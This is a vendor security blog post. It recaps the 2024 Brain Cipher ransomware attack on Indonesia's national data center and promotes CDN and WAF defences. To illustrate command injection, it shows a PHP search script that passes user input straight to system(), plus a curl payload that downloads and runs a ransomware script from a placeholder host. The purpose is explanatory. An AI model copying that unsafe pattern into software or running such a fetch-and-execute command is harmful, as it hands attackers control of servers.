Ransomware Attack!?! Let’s Learn from the Attack on Indonesia’s Pusat Data Nasional (PDN)

Mlytics SOC Engineers
Mlytics
Published in
4 min readJust now
Image generated by ChatGPT

Hey guys! Did you hear about the recent cyberattack on Indonesia’s Government Data Center (PDN)? On June 20, 2024, the center was hit by a nasty ransomware attack using a variant called “Brain Cipher”. This attack disrupted services for over 210 government institutions, including crucial ones like immigration and visa processing [1][2], and then the attackers demanded a ransom of $8 million to release the encrypted data and prevent its leakage.

Let’s dive into what ransomware is, how it spreads, and how tools like CDN and WAF can help protect against such attacks.

What is Ransomware, and How Does It Work?

Ransomware is a type of malicious software that encrypts your files and locks you out of your system until you pay a ransom. It’s like a digital hostage situation! Once the ransomware gets into your system, it encrypts your critical files, making them inaccessible until you pay the attacker to decrypt them.

How does Ransomware Spread?

  1. Phising Emails: One of the most common methods. Attackers send emails with malicious attachments or links that, when clicked download the ransomware onto your system.
  2. Malicious Attachments: Files that look harmless but contain ransomware can be spread via email or other file-sharing methods.
  3. Unverified Application: Downloading and installing software from untrusted sources can introduce ransomware to your system.
  4. Vulnerabilities: Exploiting vulnerabilities in software, especially in outdated systems, can give ransomware a way in.
  5. Command Injection: This is where things get a bit technical. Command injection is an attack technique in which an attacker alters dynamically generated content on a web page by injecting malicious code. If a web application passes unsafe user inputs (like form fields) to a system shell, it could execute malicious commands. This could lead to ransomware being downloaded and executed on the server, bypassing traditional security measures.

Spreading the Ransomware via Command Injection

Injecting ransomware via command injection is a significant security concern. Command injection vulnerabilities allow an attacker to execute arbitrary commands on the host operating system via a vulnerable application. If an attacker successfully exploits such a vulnerability, they could potentially:

  1. Download and Execute Malicious Payloads
  2. Encrypt files
  3. Demand Ransom

Command injection occurs when an application. Passes unsafe user-supplied data (forms, URL parameters, etc.) to a system shell. If the application does not properly validate or sanitize the input, an attacker could inject malicious commands.

Example Scenario

Consider a web application that has a command injection vulnerability in a search function that uses a system command to perform a search:

<?php
$search = $_GET['search'];
system("grep '$search' /var/www/data.txt");
?>

If an attacker submits a search query like

curl -O http://malicious.server/ransomware.sh; chmod +x ransomware.sh; ./ransomware.sh

The web server might execute this command, resulting in the download and execution of the ransomware.

How can Mlytics CDN and WAF help protect your system?

While CDNs (Content Delivery Networks) and WAFs (Web Application Firewalls) aren’t explicitly designed to prevent ransomware, they can be crucial components of a multi-layer security strategy.

  1. Content Delivery Networks (CDNs):
    Distribution and Load Balancing: CDNs distribute your content across multiple servers, reducing the risk of a single point of failure and making it harder for attackers to target specific servers. [3]
    DDoS Protection: CDNs often include DDoS protection, which can prevent attackers from overwhelming your servers with traffic, a common tactic used before deploying ransomware. [4]
  2. Web Application Firewalls (WAFs):
    Filtering Malicious Traffic: WAFs filter and monitor HTTP traffic, blocking malicious payloads that could contain ransomware.
    Preventing Exploits: WAFs protect against common web vulnerabilities like SQL injection and XSS, which can be used to inject ransomware into your systems. [5]

Tips to Prepare for Ransomware

  1. Regular backups: Keep up-to-date backups of all critical data. Store these backups offline and test them regularly to ensure they’re intact.
  2. Multi-layered security: implement security measures at all levels, including firewalls, intrusion detection systems, and endpoint protection.
  3. Employee training: Educate your team about phishing risks and the importance of not downloading unverified applications.
  4. Patch management: regularly update and patch your software to protect against known vulnerabilities.
  5. Utilize CDN and WAF: incorporate CDNs and WAFs into your security strategy to add layers of protection against potential attack vectors.

Final Thoughts

In today’s digital world, ransomware attacks are becoming increasingly sophisticated and disruptive. While no single solution can offer complete protection, a multi-layered approach that includes CDNs and WAFs can significantly enhance your defense mechanisms. Stay vigilant, educate your team, and implement robust security practices to safeguard your systems and data from the ever-evolving threat of ransomware.

Stay safe, stay secure, and always be prepared. How’s your cybersecurity strategy holding up? Let me know in the comments!

References

[1] Leyden, J. (2024, June 24). Indonesian government data center locked down by ransomware. The Register. https://www.theregister.com/2024/06/24/indonesia_datacenter_ransomware/

[2] Zorz, Z. (2024, June 25). Ransomware disrupts Indonesia’s national data centre, LockBit gang claims US Federal Reserve breach. Help Net Security. https://www.helpnetsecurity.com/2024/06/25/lockbit-indonesia-us-fed/

[3] Mlytics. (n.d.). Smart load balancing. Retrieved July 8, 2024, from https://www.mlytics.com/features/smart-load-balancing/

[4] Mlytics. (n.d.). DDoS protection. Retrieved July 8, 2024, from https://www.mlytics.com/features/ddos-protection/

[5] Mlytics. (n.d.). Origin shield. Retrieved July 8, 2024, from https://www.mlytics.com/features/origin-shield/

--

--